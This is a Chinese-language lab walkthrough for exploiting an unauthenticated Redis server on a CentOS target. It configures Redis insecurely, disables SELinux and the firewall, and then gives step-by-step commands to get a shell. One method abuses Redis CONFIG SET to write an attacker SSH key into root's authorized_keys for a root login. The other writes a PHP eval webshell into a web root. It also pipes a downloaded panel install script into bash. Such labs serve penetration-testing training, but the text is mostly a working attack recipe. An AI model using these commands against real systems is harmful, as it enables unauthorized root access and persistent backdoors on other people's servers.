一.靶机配置redis环境(Centos)
1. 使用yum安装redis 命令:yum install redis -y
3.修改redis配置文件 路径:/etc/redis.config
bind 127.0.0.1 修改为 bind 0.0.0.0
protected-mode yes修改为 protected-mode no
4.修改redis启动文件 路径:/lib/systemd/system/redis.service
将以下参数注释掉:
User=redis
Group=redis
RuntimeDirectory=redis
RuntimeDirectoryMode=0755
5.关闭selinux和防火墙
setenforce 0
systemctl stop firewalld
6.启动redis连接测试
Systemctl start redis
二.客户端配置redis环境并测试连接redis(kali)
1.安装redis
apt install redis-*
2.连接redis服务端(centos),出现以下如图表示连接成功
redis-cli -h 192.168.88.128
三.getshell(ssh公私钥)
1.进入 /root/.ssh 目录生成ssh公私钥
cd /root/.ssh
ssh-keygen -t rsa
2.将生成的公钥(文件id_rsa.pub)复制下来
1.连接redis
redis-cli -h 192.168.88.128
2.设置目录
config set dir /root/.ssh
3.设置文件名
config set dbfilename authorized_keys
4.写入公钥内容
set key “\n\n 公钥内容 \n\n“
5.保存并退出
save
quit
6.检查服务端(centos)是否开启ssh密钥登录 路径:/etc/ssh/sshd_config
将PubkeyAuthentication yes 参数取消注释
重启ssh服务
systemctl restart sshd
7.使用密钥连接ssh,连接成功
ssh -i id_rsa root@192.168.88.128
四.Getshell(写入webshell)
1.服务端(centos)安装web环境,直接一键安装宝塔
if [ -f /usr/bin/curl ];then curl -sSO https://download.bt.cn/install/install_panel.sh;else wget -O install_panel.sh https://download.bt.cn/install/install_panel.sh;fi;bash install_panel.sh 6dca892c
2.安装完成,打开bt网站后台,安装环境
选择安装nginx 和php环境
3.添加一个站点,记住以下路径 /www/wwwroot/192.168.88.128/
4.使用redis写入webshell
redis-cli -h 192.168.88.128
config set dir /www/wwwroot/192.168.88.128/ (3步骤路径)
config set dbfilename shell.php
set x "\n\n <?php @eval($_POST['pass’]);?> \n\n"
save
5.连接wehsell
Shell地址 http://192.168.88.128/shell.php